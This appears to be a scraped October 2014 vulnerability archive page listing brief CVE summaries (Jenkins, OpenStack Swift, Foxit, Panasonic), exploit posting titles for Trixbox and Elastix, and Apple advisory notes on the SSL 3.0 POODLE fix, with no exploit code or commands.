The Winstone servlet container in CloudBees Jenkins before 1.551 and LTS before 1.532.2 allows remote attackers to hijack sessions via unspecified vectors.
Monthly Archives: October 2014
CVE-2014-7960
OpenStack Object Storage (Swift) before 2.2.0 allows remote authenticated users to bypass the max_meta_count and other metadata constraints via multiple crafted requests which exceed the limit when combined.
CVE-2014-8074
Buffer overflow in the SetLogFile method in Foxit.FoxitPDFSDKProCtrl.5 in Foxit PDF SDK ActiveX 2.3 through 5.0.1820 before 5.0.2.924 allows remote attackers to execute arbitrary code via a long string, related to global variables.
CVE-2014-8755
Panasonic Network Camera View 3 and 4 allows remote attackers to execute arbitrary code via a crafted page, which triggers an invalid pointer dereference, related to “the ability to nullify an arbitrary address in memory.”
CVE-2014-8756
The NcrCtl4.NcrNet.1 control in Panasonic Network Camera Recorder before 4.04R03 allows remote attackers to execute arbitrary code via a crafted GetVOLHeader method call, which writes null bytes to an arbitrary address.
Fonality Trixbox CE 2.8.0.4 Command Execution
Fonality Trixbox CE version 2.8.0.4 remote root command execution exploit.
Elastix 2.4.0 Stable XSS / CSRF / Command Execution
Elastix version 2.4.0 stable suffers from cross site request forgery, remote command execution, and cross site scripting vulnerabilities.
Apple Security Advisory 2014-10-16-6
Apple Security Advisory 2014-10-16-6 – iTunes 12.0.1 is now available and addresses 83 vulnerabilities.
Apple Security Advisory 2014-10-16-5
Apple Security Advisory 2014-10-16-5 – OS X Server 2.2.5 is now available and addresses the SSL 3.0 Poodle bug. There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.
Apple Security Advisory 2014-10-16-4
Apple Security Advisory 2014-10-16-4 – OS X Server 3.2.2 is now available and addresses the SSL 3.0 Poodle bug. There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.